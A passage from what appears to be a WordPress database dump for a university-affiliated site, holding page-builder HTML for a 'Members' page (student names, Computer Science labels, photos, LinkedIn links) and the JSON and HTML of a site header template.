style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c212-outer\">\n            <div data-colibri-id=\"182-c212\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c212 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c213\" class=\"d-block style-913 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c213-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c213-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"h-global-transition-all h-heading style-914 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c214\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c215\" class=\"h-text h-text-component style-915 style-local-182-c215 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c216\" class=\"style-917 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',182,'https://gsudice.dataconn.net/?p=1799',0,'revision','',0),(1800,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',26,'https://gsudice.dataconn.net/?p=1800',0,'revision','',0),(1801,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 